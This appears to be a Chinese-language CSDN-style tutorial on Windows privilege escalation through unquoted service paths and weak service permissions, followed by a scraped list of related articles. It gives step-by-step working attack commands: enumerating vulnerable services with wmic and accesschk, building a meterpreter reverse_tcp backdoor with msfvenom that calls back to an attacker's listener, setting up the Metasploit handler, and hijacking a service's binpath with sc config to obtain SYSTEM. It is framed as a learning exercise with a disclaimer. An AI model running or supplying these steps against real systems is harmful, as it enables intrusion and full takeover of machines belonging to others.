权限提升:不带引号服务路径 || 不安全的服务权限.
权限提升:不带引号服务路径 || 不安全的服务权限.
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
目录:
权限提升:不带引号服务路径 || 不安全的服务权限.
提权思想:
不带引号服务路径原理:
不安全的服务权限原理:
权限提升:不带引号服务路径.
第一步:检测引号服务路径.
第二步:生成一个后台程序.(木马)
第三步:把这个程序(后门)放在 C 盘根目录下.
第四步:直接在我们的服务器上安装 msf .
第五步:在操作系统重启 或 开启这个服务,返回我们服务器( kali )
第六步:查看权限.(因为系统服务开启就是 SYSTEM )
权限提升:不安全的服务权限
第一步:检测这个用户的服务项.
第二步:找到一个要替换的服务.
第三步:重启这个程序服务,返回我们服务器( kali )
第四步:查看权限.(因为系统服务开启就是 SYSTEM )
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
提权思想:
不带引号服务路径原理:
当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
操作过程:检测引号服务路径--利用路径制作文件并上传--启用服务或重启--调用后成功
不安全的服务权限原理:
即使正确引用了服务路径,也可能存在其他漏洞,由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
操作过程:检测服务权限配置--制作文件并上传--更改服务路径指向--调用后成功
权限提升:不带引号服务路径.
第一步:检测引号服务路径.
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
第二步:生成一个后台程序.(木马)
后台程序(木马):https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > program.exe// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe(名字要和空格前的一样)
第三步:把这个程序(后门)放在 C 盘根目录下.
第四步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样) set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)run //执行命令
第五步:在操作系统重启 或 开启这个服务,返回我们服务器( kali )
sc start "NewServiceName" //NewServiceName是服务的名字
第六步:查看权限.(因为系统服务开启就是 SYSTEM )
权限提升:不安全的服务权限
下载 AccessChk 文件:AccessChk - Sysinternals | Microsoft Learn
第一步:检测这个用户的服务项.
C:\Users\Administrator\Desktop\accesschk.exe -uwcqv "administrators" *//检测这个用户(administrators)的服务项.
第二步:找到一个要替换的服务.
sc config "NewServiceName" binpath="C:\Program.exe"sc config "要替换的服务项名字" binpath="替换到别的程序路径"//Program.exe一般是替换为后门木马.(自己生成一个就行,操作和上面一样)
第三步:重启这个程序服务,返回我们服务器( kali )
sc start "NewServiceName" //NewServiceName是服务的名字
第四步:查看权限.(因为系统服务开启就是 SYSTEM )
学习链接:第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限_哔哩哔哩_bilibili
权限提升:不带引号服务路径 || 不安全的服务权限.相关推荐
- 数据权限过滤_带你实现SpringBoot整合JWT+Shiro进行权限认证「附源码地址」
JWT JSON Web Token(JWT)是一个非常轻巧的规范.这个规范允许我们使用 JWT 在用户和服务器之间传递安全可靠的信息. 我们利用一定的编码生成 Token,并在 Token 中加入一 ...
- 【burpsuite安全练兵场-服务端7】访问控制漏洞和权限提升-11个实验(全)
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 第四章 权限提升分析及防御
查询系统信息systeminfo 如果要查看特定的信息,可以使用systeminfo | findstr /B /C:"OS名称" /C:"OS版本" 主机名H ...
- Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
目录 权限分类 针对环境 webshell权限 本地用户权限 提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...
- 小迪渗透权限提升(捌)
文章目录 58. 网站权限后台漏洞第三方获取(58-64) 具体有哪些权限需要我们知道和了解掌握的? 演示案例: 59. Win溢出漏洞及AT&SC&PS提权 演示案例: 案例 1:如 ...
- 内网渗透测试:Windows权限提升思路
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows系统内核溢 ...
- 第59天-权限提升-Win 溢出漏洞及 ATSCPS 提权
思维导图 知识点 #明确权限提升基础知识:权限划分 #明确权限提升环境问题: WEB 及本地 #明确权限提升方法针对:针对方法适应问题 #明确权限提升针对版本:个人及服务器版本;针对方法; 知识点必备 ...
- 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 操作系统权限提升(三)之Windows系统内核溢出漏洞提权 操作系统权限提升(四)之系统错误配置-Tus ...
- Windows权限提升—溢出提权
Windows权限提升-溢出提权 1. 权限提升介绍 1.1. 权限说明 1.2. 权限提升后操作 1.3. 权限提升的意义 1.4. 权限提升整体流程 1.5. 权限获取方式 1.5.1. 特殊类型 ...
最新文章
- C# 实现简单打印(二)-打印一个文本文档,打印的内容是多行的
- MobileNet 笔记
- 我的2020年终总结:新的角色,新的开始
- linux分析目录内存,在 Linux x86-64 模式下分析内存映射流程
- 电脑键盘部分按键失灵_笔记本键盘失灵怎么办,电脑键盘失灵-中关村在线
- 电子相册如何用c语言制作,电子相册怎样制作?
- java工具类书写规范
- u盘最大单个文件支持多少g_USB 文件传输单个文件最大能用多少G???
- 设置selected选中的多种方法(总结)
- 五个优秀的硬盘健康检测工具
- 工作笔记(python给excel加密)
- 编码,隐匿在计算机软硬件背后的语言读书笔记(1)
- java代码设置路由
- 微信扫码支付:此公众号并没有这些scope的权限,错误码:10005
- RDKit 操作分子对象
- abap SY-INDEX SY-TABIX
- 中国AGR硅橡胶线行业产销情况与应用前景预测报告(新版)2022-2027
- Qt for Python关于新6.3版本的详细信息
- 从CPU和GPU出发的UGUI优化
- 超级电容的容值计算(转)